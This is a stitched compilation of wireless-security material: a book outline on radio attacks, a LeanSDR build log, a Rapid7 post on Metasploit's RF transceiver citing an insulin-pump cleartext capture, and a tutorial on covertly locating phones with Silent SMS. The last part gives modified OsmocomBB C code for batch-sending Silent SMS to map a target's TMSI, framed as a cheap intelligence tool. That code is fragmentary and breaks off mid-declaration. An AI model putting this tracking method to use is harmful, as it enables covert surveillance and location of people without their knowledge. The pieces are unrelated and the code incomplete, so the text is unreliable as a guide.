Introduction to Inside Radio: An Attack and Defense Guide


Inside Radio: An Attack and Defense Guide

This book discusses the security issues in a wide range of wireless devices and systems, such as RFID, Bluetooth, ZigBee, GSM, LTE, and GPS. It collects the findings of recent research by the UnicornTeam at 360 Technology, and reviews the state-of-the-art literature on wireless security. The book also offers detailed case studies and theoretical treatments – specifically it lists numerous laboratory procedures, results, plots, commands and screenshots from real-world experiments. It is a valuable reference guide for practitioners and researchers who want to learn more about the advanced research findings and use the off-the-shelf tools to explore the wireless world.

About the Authors


Qing YANG is the founder of UnicornTeam and the head of the Radio Security Research Department at 360 Technology. He has vast experience in the information security area. He has presented at Black Hat, DEFCON, CanSecWest, HITB, Ruxcon, POC, XCon, China ISC, etc.


Lin HUANG is a senior wireless security researcher and SDR technology expert at 360 Technology. Her interests include security issues in wireless communication, especially cellular network security. She was a speaker at Black Hat, DEFCON, and HITB security conferences. She is 360 Technology’s 3GPP SA3 delegate.



This book is a joint effort by the entire UnicornTeam, including Qiren GU, Jun LI, Haoqi SHAN, Yingtao ZENG, Wanqiao ZHANG and others.


Qiren GU is a senior security researcher in the Radio Security Department of 360 Technology and a member of UnicornTeam. He focuses on wireless communication security, cellular network security and SDR-related technologies, as well as problems in ADS-B, GPS, Bluetooth, Wi-Fi, NFC and RFID. He is a trainer for ISC, a lecturer at 360 Network Security University and a DEFCON Group 010 speaker. guy behind


Jun LI is a senior security researcher in the Radio Security Department of 360 Technology and a core member of UnicornTeam. He holds a master's degree from Chengdu University of Information Technology. He focuses on the security research of connected cars, wireless communication, hardware, etc. He has presented his research at premier security conferences such as Black Hat, DEFCON, ISC, CanSecWest, HITB and Syscan360. He is a trainer for ISC. He is the author of Smart Car Attack & Defence Demystified. He won sixth place in the MITRE IoT Challenge. He was featured in the documentary A Century With Cars by CCTV. He started the first DEFCON Group in China, DC010, and is a member of the DEFCON Groups Global Advisory Board.


Haoqi SHAN is a senior security researcher in the Radio Security Department of 360 Technology. He is also a PhD student in information security at the University of Florida. He focuses on Wi-Fi penetration, 2G/4G systems, embedded device hacking, etc. He has given a series of presentations on RFID hacking and LTE device hacking at Black Hat, DEFCON, CanSecWest, CodeBlue, Syscan360, HITB, etc.


Yingtao ZENG is a security researcher at UnicornTeam in the Radio Security Research Department of 360 Technology. He mainly focuses on the security of the Internet of Things, car remote control systems and automotive radar safety research. He has found vulnerabilities in vehicles from a variety of automobile manufacturers, including Buick, Volvo, Chevrolet, Toyota, Nissan, BYD and more. He has been a speaker at Hack In The Box (HITB), the DEFCON Car Hacking Village and Black Hat.


Wanqiao ZHANG is a senior security researcher in the Radio Security Department of 360 Technology and a member of UnicornTeam. She holds a master's degree from Nanjing University of Aeronautics and Astronautics. She focuses on the security research of communication, civil aviation radio, satellite communication, etc. She has presented her research at premier security conferences such as DEFCON, POC, RUXCON and MOSEC. She is a trainer for IChunqiu and a delegate of Qihoo 360 in 3GPP.


Hardcover ISBN: 978-981-10-8446-1

eBook ISBN: 978-981-10-8447-8

Publisher: Springer Singapore

Edition: Springer; 1st ed. 2018 edition (May 9, 2018, or April 9, 2018)

We will sell the book at HITB SECCONF 2018 Amsterdam.



Outline of Inside Radio: An Attack and Defense Guide

Chapter 1 Overview of Wireless Security, Attack and Defense

1.1 Overview of wireless security
1.1.1 Origin of wireless security
1.1.2 Difference between wireless security and mobile security
1.1.3 Status quo of wireless security
1.2 Wireless attack and defense methods
1.2.1 Common attack targets
1.2.2 Wireless attack methods
1.2.3 Wireless defense methods
1.2.4 Trend of wireless security

Chapter 2 Tools for Wireless Security Research

2.1 Software-defined radio technology
2.1.1 SDR capabilities
2.1.2 SDR usage
2.2 SDR hardware tools
2.2.1 USRP
2.2.2 RTL-SDR
2.2.3 HackRF
2.2.4 bladeRF
2.2.5 LimeSDR
2.3 SDR software tool — GNU Radio
2.3.1 GNU Radio installation
2.3.2 The first thing to do after installation
2.3.3 Example: OFDM Tunnel
2.4 Sniff mouse and keyboard data
2.4.1 Use SDR to sniff data packets of wireless keyboards and mice running on Nordic chips
2.4.2 MouseJack

Chapter 3 RFID/NFC Security

3.1 Introduction to Mifare Classic
3.2 Security analysis of Mifare Classic
3.2.2 Review of the process of cracking Mifare Classic
3.3 A real case of cracking Mifare Classic
3.3.1 Introduction to Proxmark Ⅲ
3.3.2 Burn and use Proxmark III firmware
3.3.3 Proxmark III client
3.3.4 Test the security of Mifare Classic with Proxmark III
3.3.5 Introduction to Chameleon-Mini
3.3.6 Burn and use Chameleon-Mini firmware
3.3.7 Simulate Mifare Classic by combining Proxmark III and Chameleon-Mini
3.3.8 Conclusion of HF attack and defense
3.4 Security analysis of LFID cards
3.4.1 Introduction to LFID cards
3.4.2 Coding principle of ID cards
3.4.3 Decoding principle of ID cards
3.4.4 Read data from ID cards
3.4.5 Format of the ID card number
3.5 Clone an LFID card
3.5.1 Simulation attacks with Proxmark III
3.5.2 Clone attacks with a blank card
3.5.3 Simulation attacks with HackID
3.6 EMV privacy leakage
3.6.1 EMV introduction
3.6.2 Mechanism of privacy leakage in contactless chip cards
3.6.3 Phenomenon of privacy leakage in contactless chip cards
3.6.4 Contactless chip card fraud
3.6.5 Privacy protection in the use of contactless chip cards

Chapter 4 433/315MHz Communication

4.1 Sniff and analyze the security of remote control signals
4.2 Attacks by replaying remote control signals
4.2.1 Parking bar signal replay
4.2.2 Wireless door bell signal replay
4.2.3 Vibrator signal replay
4.3 Crack fixed-code garage doors with brute force
4.3.1 Complexity of brute-force attack
4.3.2 Hardware for fixed-code brute-force attack
4.4 Security analysis of remote car key signals
4.4.1 Generation of remote control signals
4.4.2 Security analysis of Keeloq key generation algorithm
4.4.3 An example of remote controller bugs
4.4.4 Rolljam replay attacks on car keys
4.4 Security analysis of the PKE system
4.5 Security analysis of the tire pressure monitoring system

Chapter 5 Aeronautical Radio Navigation

5.1 Introduction to ADS-B system
5.1.1 Definition of ADS-B
5.1.2 Definition of 1090ES
5.2 ADS-B signal encoding
5.2.1 Modulation method
5.2.2 Format of message
5.2.3 Altitude code
5.2.4 CPR longitude and latitude code
5.2.5 CRC validation
5.3 ADS-B signal sniffing
5.3.1 Receive ADS-B signal with “dump1090”
5.3.2 Receive ADS-B signal with “gr-air-modes”
5.4 ADS-B signal deception
5.5 Analysis of attack and defense

Chapter 6 Bluetooth Security

6.1 Introduction to Bluetooth technology
6.3 Bluetooth sniffing tool Ubertooth
6.3.1 Ubertooth software installation
6.3.2 Ubertooth usage
6.4 Low-power Bluetooth
6.4.1 TI’s BLE Sniffer
6.4.2 Sniff BTLE data packets with “ubertooth-btle”
6.4.3 Read and write BLE devices’ properties with a mobile app
6.4.4 Transmit data packets by simulating the BLE device

Chapter 7 ZigBee Technology

7.1 Introduction to ZigBee
7.1.1 The relationship between ZigBee and IEEE 802.15.4
7.1.2 Structure of 802.15.4 frames
7.1.3 Different types of MAC frame in ZigBee
7.1.4 Device types and network topology of ZigBee
7.1.5 ZigBee networking
7.1.6 Application layer of ZigBee
7.1.7 The application support sub-layer of ZigBee
7.1.8 Application profile of ZigBee
7.2 ZigBee security
7.2.1 Security layers
7.2.2 Key types
7.2.3 Security levels
7.2.4 Key distribution
7.2.5 Access authentication for ZigBee nodes
7.3 ZigBee attacks
7.3.1 Attacking tools
7.3.2 Protocol analysis software
7.3.3 Network discovery
7.3.4 Attack an unencrypted network
7.3.5 Attack an encrypted network
7.4 An example of attacking
7.4.1 Obtain the key from the device
7.4.2 Attacks by using the key
7.5 Summary of attacks and defenses

Chapter 8 Mobile Network Security

8.1 Security status of the GSM system
8.1.1 Terminology and basic concepts of the GSM/UMTS system
8.1.2 Security of GSM encryption algorithms
8.1.3 Active attack and passive attack in GSM
8.1.4 GSM sniffing with “gr-gsm”
8.2 IMSI Catcher
8.2.1 What is an IMSI Catcher?
8.2.2 IMSI Catcher in GSM environment
8.2.3 IMSI Catcher in UMTS environment
8.2.4 IMSI Catcher in LTE environment
8.2.5 Defect of the IMSI Catcher
8.2.6 Stingray cellphone tracker
8.2.7 IMSI Catcher Detector
8.3 Femtocell security
8.3.1 Introduction to femtocell
8.3.2 Attack surface of femtocell
8.3.4 GSM femtocell based on VxWorks
8.4 LTE redirection and downgrade attack
8.4.1 Redirection attack principles: IMSI catcher, DoS attack, redirection attack
8.4.2 The cause of redirection bugs
8.5 ‘Ghost Telephonist’ Attack
8.5.1 Vulnerability principle
8.5.2 Experiment setting
8.5.3 Attack methods
8.5.4 Countermeasures
8.6 Analysis of attack and defense

Chapter 9 Satellite Communication

9.1 Overview of artificial satellites
9.2 GPS security research
9.2.1 GPS sniffing and security analysis
9.2.2 GPS spoofing
9.2.3 Methods of defense and suggestions
9.3 Security analysis of Globalstar system
9.3.1 Globalstar’s CDMA technology
9.3.2 Globalstar data cracking
9.3.3 Possible attack methods


Building LeanSDR on Mac OS X

LeanSDR: Lightweight, portable software-defined radio

git clone
cd leansdr/src/apps


g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable -DGUI -lX11 -o leandvb  ||  \
    g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable       -o leandvb
In file included from
../leansdr/gui.h:16:10: fatal error: 'X11/X.h' file not found
#include <X11/X.h>
1 error generated.
g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable -DGUI -lX11 -o leansdrscan  ||  \
    g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable       -o leansdrscan warning: comparison of unsigned expression < 0 is always false [-Wtautological-compare]
        if ( nr < 0 ) fatal("read");
             ~~ ^ ~
1 warning generated.
ld: library not found for -lX11
clang: error: linker command failed with exit code 1 (use -v to see invocation) warning: comparison of unsigned expression < 0 is always false [-Wtautological-compare]
        if ( nr < 0 ) fatal("read");
             ~~ ^ ~
1 warning generated.
g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable -DGUI -lX11 -o leansdrcat  ||  \
    g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable       -o leansdrcat
ld: library not found for -lX11
clang: error: linker command failed with exit code 1 (use -v to see invocation)
g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable -DGUI -lX11 -o leantsgen  ||  \
    g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable       -o leantsgen
ld: library not found for -lX11
clang: error: linker command failed with exit code 1 (use -v to see invocation)
g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable -DGUI -lX11 -o leanchansim  ||  \
    g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable       -o leanchansim
ld: library not found for -lX11
clang: error: linker command failed with exit code 1 (use -v to see invocation)
g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable -DGUI -lX11 -o leandvbtx  ||  \
    g++ -O3 -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable       -o leandvbtx
ld: library not found for -lX11
clang: error: linker command failed with exit code 1 (use -v to see invocation)


sudo find / -name "X.h"
find: /dev/fd/cn0xroot: No such file or directory
find: /dev/fd/cn0xroot: No such file or directory


APPS = leandvb leansdrscan
APPS += leansdrcat leantsgen leanchansim leandvbtx

all: $(APPS)

clean:
	rm -f $(APPS)

DEPS = ../leansdr/*.h

# XQuartz installs the X11 headers and libraries under /opt/X11 on macOS,
# which is why the stock flags fail with "X11/X.h file not found" and
# "library not found for -lX11".
CXXFLAGS = -O3 -I.. -I/opt/X11/include -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable

# Each app is built from its own .cc file; try the X11 GUI build first and
# fall back to a GUI-less build if libX11 cannot be linked.
# Recipe lines must start with a tab, not spaces.
%: %.cc $(DEPS)
	g++ $(CXXFLAGS) -DGUI $< -L/opt/X11/lib -lX11 -o $@ || \
	g++ $(CXXFLAGS) $< -o $@

EMBED_FLAGS = -I.. -Wall -Wno-sign-compare -Wno-array-bounds -Wno-unused-variable \
	-Ofast -mfpu=neon -funsafe-math-optimizations -fsingle-precision-constant

leandvb.embedded: leandvb.cc $(DEPS)
	g++ $(CXXFLAGS) $(EMBED_FLAGS) $< -static -o $@ || \
	g++ $(CXXFLAGS) $(EMBED_FLAGS) $< -o $@


leandvb --help
Usage: leandvb [options]  < IQ  > TS
Demodulate DVB-S I/Q on stdin, output MPEG packets on stdout

Input options:
  --u8           Input format is 8-bit unsigned (rtl_sdr, default)
  --f32          Input format is 32-bit float (gqrx)
  -f HZ          Input sample rate (default: 2.4e6)
  --loop         Repeat (stdin must be a file)
  --inbuf N      Additional input buffering (samples)

Preprocessing options:
  --anf N        Number of birdies to remove (default: 1)
  --derotate HZ  For use with --fd-pp, otherwise use --tune
  --resample     Resample baseband (CPU-intensive)
  --resample-rej K  Aliasing rejection (default: 10)
  --decim N      Decimate baseband (causes aliasing)
  --cnr          Measure CNR (requires samplerate>3*symbolrate)
  --fd-pp NUM    Dump preprocessed IQ data to file descriptor

DVB-S options:
  --sr HZ        Symbol rate (default: 2e6)
  --tune HZ      Bias frequency for demodulation
  --drift        Track frequency drift beyond safe limits
  --standard S   DVB-S (default), DVB-S2 (not implemented)
  --const C      QPSK (default), BPSK .. 32APSK (DVB-S2 only)
  --cr N/D       Code rate 1/2 (default) .. 7/8 .. 9/10
  --fastlock     Synchronize more aggressively (CPU-intensive)
  --sampler      nearest, linear, rrc
  --rrc-steps N  RRC interpolation factor
  --rrc-rej K    RRC filter rejection (defaut:10)
  --roll-off A   RRC roll-off (default: 0.35)
  --viterbi      Use Viterbi (CPU-intensive)
  --hard-metric  Use Hamming distances with Viterbi

Compatibility options:
  --hdlc         Expect HDLC frames instead of MPEG packets
  --packetized   Output 16-bit length prefix (default: as stream)

General options:
  --buf-factor   Buffer size factor (default:4)
  --hq           Maximize sensitivity
                 (Enables all CPU-intensive features)
  --hs           Maximize throughput (QPSK CR1/2 only)
                 (Disables all preprocessing)

UI options:
  -h             Display this help message and exit
  -v             Output debugging info at startup and exit
  -d             Output debugging info during operation
  --fd-info NUM  Output demodulator status to file descriptor
  --fd-const NUM Output constellation and symbols to file descr
  --gui          Show constellation and spectrum (X11)
  --duration S   Width of timeline plot (default: 60)
  --linger       Keep GUI running after EOF

Testing options:
  --awgn STDDEV  Add white gaussian noise (slow)
leanchansim --help
Usage: leanchansim [options]  <  > IQ.out
Simulate an imperfect communication channel.

Input options:
  --iu8              Interpret stdin as complex unsigned char
  --if32             Interpret stdin as complex float
  -f Hz              Specify sample rate
  --loop             Repeat (stdin must be a file)

Gain options:
  --scale FACTOR     Multiply by constant

Drift options:
  --lo HZ            Specify nominal LO frequency
  --ppm PPM          Specify LO accuracy
  --drift-period S   Drift +-ppm every S seconds
  --drift-rate R     Drift with maximum rate R (Hz/s)
  --drift2-amp HZ    Add secondary drift (range in Hz)
  --drift2-freq HZ   Add secondary drift (rate in Hz)

Noise options:
  --awgn STDDEV      Add white gaussian noise (dB)

Output options:
  --ou8              Output as complex unsigned char
  --of32             Output as complex float
leandvbtx --help
Usage: leandvbtx [options]  < TS  > IQ
Modulate MPEG packets into a DVB-S baseband signal
Output float complex samples

Options:  -f INTERP[/DECIM]        Samples per symbols (default: 2)
  --roll-off R             RRC roll-off (defalt: 0.35)
  --power P                Output power (dB)
  --agc                    Better regulation of output power
  -v                       Verbose output
leansdrcat --help
Usage: leansdrcat [options]
Forward from stdin to stdout at constant rate.

  --block      Pause when stdout is busy (default: '#' on stderr)
  --nonblock   Silently ignore when stdout is busy
  --cbr R      Set rate in bits per second
  --cbr8 R     Set rate in bytes per second
  --cbr16 R    Set rate in 16-bit words per second
  --cbr32 R    Set rate in 32-bit words per second
  --cbr64 R    Set rate in 64-bit words per second
  -h           Display this help message and exit
leansdrscan --help
Usage: leansdrscan [options]  [program settings]
Run , cycling through combinations of settings.
Example: 'leansdrscan -v cat -n,-e' will feed stdin through 'cat -n' and 'cat -e' alternatively.

  -h              Print this message
  -v              Verbose
  --timeout N     Next settings if no output within N seconds
  --rewind        Rewind input (stdin must be a file)
  --probesize N   Forward only N bytes (with --rewind)
leantsgen --help
Usage: leantsgen [-c PACKETCOUNT]
Output numbered MPEG TS packets on stdout.


rtl_sdr -g 0 -f 315e6 -s 1000000 /tmp/test.ts
leandvb --gui -v -d -f 1000e3 --sr 500e3 --cr 1/2 --derotate -4500 --anf 0 < /tmp/test.ts > mpeg.ts


Metasploit's RF Transceiver Capabilities



As an example of this kind of testing, in 2016 Rapid7's Jay Radcliffe disclosed several vulnerabilities in Johnson & Johnson's Animas OneTouch Ping insulin pump. Below is a capture from the attack demonstration: the cleartext exchange between the meter remote (REMOTE) and the pump (PUMP).

REMOTE: 00 00 00 04 A3 5A 92 B2 4C 00 0E 0F .....Z..L...
REMOTE: 00 00 00 04 A3 5A 92 B2 4C 00 0E 0F .....Z..L...
PUMP: 00 00 FF 00 1A D1 81 81 ........
REMOTE: 20 00 0E 00 BF DB CC 6F ......o
PUMP: 03 00 F1 04 16 B9 B9 87 2C 01 00 00 ........,...
REMOTE: 03 00 F8 00 31 FD C9 EE ....1...
PUMP: 03 00 07 04 88 76 DA DD 2C 01 00 00 .....v..,...
REMOTE: 03 00 12 00 F0 30 0E FC .....0..
PUMP: 20 00 ED 12 E7 BC 93 43 01 01 27 05 26 02 8F 00 ......C..'.&...
PUMP: 57 45 45 4B 44 41 59 00 00 00 WEEKDAY...
PUMP: 05 00 EA 00 D5 8F 84 B3




The rise of the Internet of Things

We spend a lot of time monitoring our corporate networks. We have many tools to detect strange behaviors. We scan for vulnerabilities. We measure our exposure constantly. However, we often fail to recognize the small (and sometimes big) Internet of Things (IoT) devices that are all around our network, employees, and employees’ homes. Somewhat alarmingly – considering their pervasiveness — these devices aren’t always the easiest to test.

Though often difficult, it is technically possible to find and identify some of these IoT devices via their Ethernet side connection. But that doesn’t always give us a full picture of the risk these devices present to consumers or organizations. When assessing only Ethernet connected devices you can miss the wireless world that can have a major impact on the security of your organization. Wireless systems often control alarm systems, surveillance monitoring, door access, server room HVAC controls, and many other areas.

Which leaves us with one very critical question: how do you really determine the risk of these devices?

Let’s start with the basics:

  • What do these connected devices do?
  • What is the range of exposure of these devices?
  • Does the device have wireless capabilities?

Traditionally, we often perform perimeter scans of our 802.11 wireless networks to ensure our Access Points are secure and the network bleed isn’t too large. We can monitor these Access Points (APs) to create overlap in case one goes down or gets interference from a nearby kitchen microwave.

However, if you’re asking yourself, “but what about the rest of the wireless spectrum?” that’s exactly the position we found ourselves in.

Radio, radio, everywhere

Chances are your company and employees are already using many other radio frequencies (RFs) outside of the standard 802.11 network for various reasons. Perhaps you have a garage door with a wireless opener? Company vehicle key fobs? Not to mention RFID card readers, wireless security systems, Zigbee controlled lights, or HVAC systems.

What are the ranges for these devices? Are they encrypted or protected? What happens when they receive interference? Do they fail in a closed or open state?

The inability to effectively answer these questions (easily or even at all) is the very reason we are releasing the RFTransceiver extension for Metasploit’s Hardware Bridge, and why we think this will be a critical tool for security researchers and penetration testers in understanding the actual attack surface.

Now, security teams will be able to perform a much broader assessment of a company’s true security posture. They will be able to test physical security controls and better understand when foreign IoT and other devices are brought onto the premises.

Sunlight is the best disinfectant

Much of the activity undertaken in the name of security research can be contentious, divisive, or hard to understand. This is certainly true of RF testing, an area of research becoming both more prevalent and increasingly necessary as we see more and more technologies leveraging RF communications.

The most common criticism of any technology created for the purpose of security testing is that bad guys could use it to do bad things. The most common response from the security research community is that the bad guys are already doing bad things, and that it’s only when we understand what they’re doing, can effectively replicate it, and demonstrate the potential impact of attacks, that we can take the necessary steps to stop them. Sunlight is the best disinfectant.

This is the logic behind Metasploit, as well as what drives Rapid7’s extensive vulnerability research efforts. It is also the reasoning behind the RFTransceiver. We strongly believe that RF testing is an incredibly important – though currently often overlooked – component of vulnerability testing. We believe that failing to test the usage of radio frequency in products puts people and organizations at risk. We also believe the importance of RF testing will continue to escalate as the IoT ecosystem further expands.

To provide an example of this kind of testing, in 2016, Rapid7’s Jay Radcliffe disclosed vulnerabilities in Johnson & Johnson’s Animas OneTouch Ping insulin pump. The popular pump has a blood glucose meter that serves as a remote control via radio frequency in a proprietary wireless management protocol. Communications between the pump and the remote control are sent in cleartext, rather than being encrypted. This creates an opportunity for an attacker with the right technical skills and resources, opportunity, and motive to spoof the Meter Remote and trigger unauthorized insulin injections.

While Jay considered the likelihood of an attacker exploiting these vulnerabilities in the wild to be quite low, it could seriously harm a patient using the technology. Fortunately, Jay’s research uncovered the problem and he was able to work with Johnson & Johnson to notify patients and advise them of ways to mitigate the risk. Without RF testing, these vulnerabilities would have continued to go unnoticed, and patients would not have the opportunity to make informed choices to protect themselves.

How it works

Just one quick author’s note before we get into the ‘how-to’ portion. Rapid7 does not sell the hardware required to perform RF testing. The required hardware can be found at any number of places, including Hacker Warehouse, Hak5, or any electronics store that carries software defined radios or RF transmitter hobbyist equipment.

With the RFTransceiver, security pros have the ability to craft and monitor different RF packets to properly identify and access a company’s wireless systems beyond Ethernet accessible technologies.

The first RFTransceiver release supports the TI cc11xx Low-Power Sub-1GHz RF Transceiver. The RFTransceiver extension makes it possible to tune your device to identify and demodulate signals. You can even create short bursts of interference to identify failure states. This release provides a full API that is compatible with the popular RfCat python framework for the TI cc11xx chipsets. If you have existing programs that use RfCat you should be able to port those into Metasploit without much difficulty. This release comes with two post modules: an Amplitude Modulation based brute forcer (rfpwnon) and a generic transmitter (transmitter).

How to use RFTransceiver

Using the new RFTransceiver extension requires the purchase of an RfCat-compatible device like the Yard Stick One. Then download the latest RfCat drivers; included with those drivers you will find rfcat_msfrelay. This is the Metasploit Framework relay server for RfCat. Run it on the system with the RfCat-compatible device attached.

Then you can connect with the hardware bridge:

./msfconsole -q

msf > use auxiliary/client/hwbridge/connect

msf auxiliary(connect) > run

[*] Attempting to connect to

[*] Hardware bridge interface session 1 opened ( -> at 2017-02-16 20:04:57 -0600

[+] HWBridge session established

[*] HW Specialty: {"rftransceiver"=>true}  Capabilities: {"cc11xx"=>true}

[!] NOTICE:  You are about to leave the matrix.  All actions performed on this hardware bridge

[!]          could have real world consequences.  Use this module in a controlled testing

[!]          environment and with equipment you are authorized to perform testing on.

[*] Auxiliary module execution completed

msf auxiliary(connect) > sessions

Active sessions


Id  Type                   Information    Connection

--  ----                   -----------    ----------

1   hwbridge cmd/hardware  rftransceiver -> (

msf auxiliary(connect) > sessions -i 1

[*] Starting interaction with 1...

hwbridge > status

[*] Operational: Yes


[*] FW Version: 450

[*] HW Version: 0348

To learn more about the RFTransceiver, you can download the latest Metasploit here:

GSM Hacking: The application of Silent SMS in technical investigation

GSM base station

0x00 Preface


How is this done? The first choice is of course the high-end Signaling System No. 7 (SS7). You need access to an SS7 signaling point that supports MAP (Mobile Application Part); in theory you can then intercept, block and forge the calls and SMS of any mobile subscriber in the world, and also obtain the Cell ID the phone is currently attached to, for precise location. Because the world's carriers are connected to one signaling network, unless a particular carrier filters signaling, your commands are faithfully executed by carriers worldwide no matter which country you access SS7 from. Rental prices for the commonly available international SS7 access points currently start at a few thousand US dollars per month, which is not very expensive for an organization.



Signaling System No. 7 (SS7) is a set of telecommunication protocols defined by ITU-T, used mainly to provide inter-office signaling for telephone companies. SS7 uses common-channel signaling (CCS), i.e. out-of-band signaling: the signaling service is carried over a separate packet-switched network.

MAP (Mobile Application Part) is a subset of SS7 used to connect the distributed switching elements (MSCs) with the master database (HLR). The HLR dynamically stores the current location and profile of each mobile subscriber and is consulted when handling incoming calls; when a subscriber's location changes, the HLR is updated accordingly and the subscriber is served by another switch in the network.




Open the field toolkit of the Chaoyang residents, one of the world's five top intelligence organizations, and you will find many home-made intelligence tools. This article introduces one of them: a low-cost implementation of Silent SMS and a simple application of it.

In fact, Silent SMS is used extensively by law enforcement in many countries even though they also use SS7; the Berlin police, for example, sent more than 100,000 of them last year. Unlike SS7, which can only locate a phone to the cell, Silent SMS combined with a fake base station and triangulation can reach a positioning accuracy of about 1 meter in open space; in practice it can pinpoint a particular person in a square. Even if the target is in disguise, the phone they carry will unknowingly tell us the truth.

0x01 Background

The phone number (MSISDN) is rarely transmitted over the mobile network. To the network, the unique ID that distinguishes handsets is the IMSI (International Mobile Subscriber Identity). The MSISDN is a human-friendly, real-world mapping of the IMSI. When you call or text, you submit the other party's MSISDN; the network maps that MSISDN back to an IMSI before it can process the request. When you receive a call or text, the other party's MSISDN is sent to you separately so that you know who it is.

For security and privacy, the IMSI is also designed to be transmitted over the network as little as possible; normally you only submit your IMSI on the first Attach and on location updates after moving into another area. Once the network has confirmed your identity it assigns you a temporary identity: in GSM the TMSI (Temporary Mobile Subscriber Identity), in LTE the S-TMSI (which, for simplicity, we also call TMSI). From then on, whenever identification is needed, the TMSI is used.


The IMSI (International Mobile Subscriber Identity) uniquely identifies a mobile subscriber worldwide: one IMSI identifies exactly one subscriber and is valid everywhere.

A wireless network covers a large area; if the IMSI were captured by criminals while being transmitted over the network, that would be very dangerous. So another number temporarily stands in for the IMSI in transit: the TMSI (Temporary Mobile Subscriber Identity). Substituting the TMSI for the IMSI strengthens the system's confidentiality and prevents unauthorized individuals or groups from stealing the IMSI, or tracking the subscriber's location, by monitoring signaling on the radio path.





0x02 Principle

When a new Mobile Terminated service, usually an SMS or an incoming call, is to be delivered, the mobile network initiates Paging. The target phone, listening to the channel, sees the network paging its TMSI and requests a channel; once the request succeeds the phone switches to that channel and sends a paging response, the network acknowledges it, and after authentication, cipher negotiation and so on, the network starts delivering the service. Only then does the phone learn whether it is a call or an SMS; after receiving part of the service information the phone decides whether and how to alert the user: incoming call or incoming SMS, ring or vibrate, and so on.


A Silent SMS is an SMS in a special format: once particular flag bits are set in the SMS header, the receiving phone gives no indication or reaction on receipt, does not store the message content, and simply discards it. Without special technical means there is no way to tell that a phone has received a Silent SMS. When we send a Silent SMS to the target phone we observe the Paging message broadcast by the network, but unlike a phone call there is no need to worry about delay or hanging up in time, and nothing is shown on the target phone. Moreover, we can also capture the complete content of the SMS over the air; capturing an SMS with the specific content we constructed ourselves helps further confirm that the TMSI is indeed our target.

A TMSI is valid within one LAC (Location Area Code)/TA (Tracking Area); each time the phone enters a new LAC/TA, the network assigns it a new TMSI. To find the mapping, you must listen in the LAC/TA where the target phone currently is. Working in our favor, Paging is also scoped to the LAC/TA, with the exception of LTE's Smart Paging.

0x03 Low-cost implementation

A Chaoyang resident's intelligence tools should be as cheap as possible, so we use open-source software plus cheap hardware. Our preferred setup is OsmocomBB + Motorola C118/C139.

Online you can find source code written by foreign hackers that uses Python to drive a USB SMS modem to send Silent SMS and uses Airprobe + RTL-SDR to receive, but the hardware costs more than ours and, above all, the code is rather scattered.

OsmocomBB: an open-source GSM baseband project rewritten with reference to a leaked set of baseband source code; it only supports the TI Calypso baseband processor. The leaked source used as reference was incomplete: only 90+% of the source code, some linked libraries without source, and no DSP code. OsmocomBB is designed as an experimental tool for hackers rather than a phone system for ordinary users; to make it easy to write and modify, its Layer 2 and Layer 3 run on the PC.

Motorola C118/C139: essential for working with GSM; native support for frequency hopping, cheap (only 7 yuan on Taobao), can be bought in bulk and attached to a USB hub for multi-channel SMS sending and receiving. Of the two, the C139 has a color screen and a larger ROM, so it has the potential to be turned into a hacker phone for complex GSM attacks or engineering drive tests, with Chinese display and input.

Concretely, we need two C118/C139 phones: one to send the Silent SMS, and the other to listen to the PCH and record the TMSIs being paged.





0x04 How to send a Silent SMS

The mobile program in OsmocomBB works at Layers 2-3 and is used to send and receive SMS and to make and receive calls. We modify it to send Silent SMS. In effect, the C118/C139 can be regarded as the cheapest SMS modem, and the modified mobile program as bulk-SMS software.

Constructing a Silent SMS


We only need to set the two corresponding header fields (TP-PID and TP-DCS) before sending, and what goes out is a Silent SMS. Both fields can be set, or only one of them. Occasionally an operator filters SMS in special formats, in which case you have to try which of the two actually works. I myself have not encountered filtering so far.


To send Silent SMS on a particular schedule we need a timer. Once the interval is set, the timer fires periodically and calls the send function to send one Silent SMS.

/* Timer and flags for the Silent SMS batch sender. The declarations of
 * smscnt, call_vty and the ping_* buffers are not shown on the page and
 * are assumed here; the snippets below use them. */
struct osmo_timer_list tick_timer_smsping;
struct {
    int pid;   /* 1: set TP-PID to 0x40 (short message type 0) */
    int dcs;   /* 1: set TP-DCS to 0xC0 (message waiting, discard) */
} silent_sms;
static int smscnt;                 /* messages still to be sent in the batch */
static struct vty *call_vty;       /* VTY session that started the batch */
static char *ping_sms_sca;         /* SMSC address for the batch */
static char *ping_number;          /* destination number for the batch */
static char *ping_sms_txt;         /* message text for the batch */



/* VTY command "silent TP-PID TP-DCS": choose which header field(s) to
 * set. The original checked only argc >= 1 but read argv[1]; both
 * arguments are required, so check for two. */
DEFUN(silent, silent_cmd, "silent TP-PID TP-DCS",
    "Set SMS messages header\n"
    "1 for 0x40, 0 for default\n"
    "1 for 0xC0, 0 for default\n")
{
    int pid;
    int dcs;

    if (argc >= 2) {
        pid = atoi(argv[0]);
        dcs = atoi(argv[1]);
        if (pid) {
            silent_sms.pid = 1;
        } else {
            silent_sms.pid = 0;
        }
        if (dcs) {
            silent_sms.dcs = 1;
        } else {
            silent_sms.dcs = 0;
        }
    }

    return CMD_SUCCESS;
}


if(smscnt == MAX_SMS_Count){//开始批量发送
        tick_timer_smsping.cb = &sms_ping; //初始化定时器 = &timer_step;
        ping_sms_sca = strdup(sms_sca);
        ping_number = strdup(number);
        ping_sms_txt = strdup(argv_concat(argv, argc, 2));
        call_vty = vty;
        sms_send(ms, sms_sca, number, argv_concat(argv, argc, 2));
        vty_out(vty, "Slient SMS %d sent%s", smscnt, VTY_NEWLINE);


struct gsm_sms *sms_from_text(const char *receiver, int dcs, const char *text)
